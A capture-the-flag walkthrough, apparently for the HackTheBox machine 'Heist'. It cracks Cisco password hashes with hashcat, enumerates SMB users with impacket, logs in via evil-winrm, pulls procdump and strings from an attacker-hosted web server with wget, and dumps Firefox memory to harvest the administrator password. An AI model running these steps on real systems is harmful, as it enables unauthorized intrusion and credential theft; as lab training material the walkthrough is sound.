As usual, let's start with nmap:
nmap -sV -sC -p- 10.10.10.149
Open browser and go to 10.10.10.149
Click on Login as guest
Click on Attachment
Notice that the conversation was started by user Hazard
Looks like we may have found some credentials.
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
Let's do some password cracking. If we google password cracking type 7, we find a useful website called
Finally, we want to crack $1$pdQG$o8nrSzsGXeaduXrjlvKc91
To do that let's use hashcat
Go to Downloads folder for instance and create a new text file here called hashed.txt file and copy paste your hash in it using the nano command
hashcat -m 500 hashed.txt /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt
Wait until it finishes the initialization:
When the initialization is done you should get the following:
Type s to get the status
This might take a few minutes. It tells us below estimated time is 21 minutes. Just wait.
After a few minutes we get the password: stealth1agent
Hashcat assigns each algorithm a number or "hash mode". MD5 was assigned the hash mode 0 for instance.
-m 0 This advises hashcat that we are going to crack md5 passwords.
-m 500 is for 500md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5)2
there are many different numbers, check out here full list:
Now let's turn to SMB. port 445 is open which is SMB.
smbclient -L 10.10.10.149
SMB authentication always require a username. If you don't specify one, it will use your VM username as default. When prompted to enter a password, just press enter.
Ok that didn't work, we were not able to get a list of the shares available.
Recap on credentials found so far:
smbclient -L 10.10.10.149 -U hazard
For the password, I tried all the password we found above and stealth1agent worked!
I checked all the shares available but access is denied
smbclient \\\\10.10.10.149\\ADMIN$ -U hazard
smbclient \\\\10.10.10.149\\C$ -U hazard
smbclient \\\\10.10.10.149\\IPC$ -U hazard
Now we do have the credentials for one of the user
Let's use something called lookupsid.py from impacket. This might help us enumerate more users.
The one we need is:
This tells us that we need to use the following format:
python3 lookupsid.py username:password@targetIP
python3 lookupsid.py Hazard:email@example.com
There is another user called chase
Let's use evil-winrm (winrm for windows remote management)
First we need to install it.
Open a brand new command prompt and type the following commands:
First we need to install the dependencies:
sudo gem install winrm winrm-fs stringio
Now we need to install git:
sudo apt install git
We need to clone this git
sudo git clone https://github.com/Hackplayers/evil-winrm.git
Now let's change directory
Now we can connect to the target using:
./evil-winrm.rb -i 10.10.10.149 -u chase
when prompted for the password enter:
we are in!
Congratulations! You got the flag!
Note that there is also a todo.txt on the desktop
Now let's look for the root flag
Access is denied. So we need to escalate our privileges.
Let's see what processes are running:
ps stand for Process Status
Perhaps Chase is using Firefox to login to the Issues portal? We have control over the process so we could potentially do a process dump and perhaps find some passwords in it?
Let's use procdump. It can be used to dump process memory. From your VM, go to https://docs.microsoft.com/en-us/sysinternals/downloads/procdump and click on Download ProcDump
Once downloaded to your VM, open a new command prompt and type:
We now have procdump64.exe in our Downloads folder
From this Downloads folder, we are going to create a small webserver on our VM using:
sudo python3 -m http.server 8080
Make sure you stay in the Downloads folder
Now we have created a web service on our VM on port 8080
Do not close this window! Otherwise your webservice will be shutdown
Let's check that our web server is working by opening our web browser and type:
The IP of my VM is 10.10.14.3, yours will be different. If you don't know the IP of your VM, open a new command prompt and type ifconfig
OK now that our web service is working, we are going to get the target machine to go to http://10.10.14.3:8080 and retrieve procdump64.exe
To do that, go back to the target machine. Make sure you are C:\Users\Chase\Desktop using:
Now let's go get procdump64.exe from our web server
wget "http://10.10.14.3:8080/procdump64.exe" -outfile "procdump64.exe"
We successfully downloaded procdump64.exe to the target machine!
I am now going to pick one of the process ID, here I am picking the first one below, with process ID 380. Your process ID will be different.
I want to create a process dump of the process ID 380 (Firefox). To do that I am using the following command:
.\procdump64.exe -ma 380 firefox.dmp
-ma flag is used to dump the entire memory of the Firefox process
firefox.dmp will be the name of my dump file
The first time you use this software you need to accept the eula by adding -accepteula
.\procdump64.exe -ma 380 firefox.dmp -accepteula
Now that we have the dump, we need to download strings.exe
From your VM, go to https://docs.microsoft.com/en-us/sysinternals/downloads/strings
Click on Download Strings
Strings.zip has been downloaded to your VM
Type n and enter
strings.exe is now in our Downloads folder, meaning that is is also still on our web server:
Now we need to get strings.exe downloaded onto the target machine. To do this, go back to the target machine and type:
wget "http://10.10.14.3:8080/strings.exe" -outfile "strings.exe"
Great! srings.exe is now on the target machine.
We are going to use strings.exe to search in the dump file (firefox.dmp) for any strings that have the word "password" in it. The idea is to find the password for administrator in the Firefox dump.
To do that, type:
./strings.exe firefox.dmp | findstr /i password
This will take a while
We find the following credentials in the dump:
Now that we have the credentials for the administrator account, we can use evil-winrm again, but this time login as administrator. From your VM, open a new command prompt window and type:
./evil-winrm -i 10.10.10.149 -u administrator
Enter the password:
We are in!
Congratulations! You got the root flag!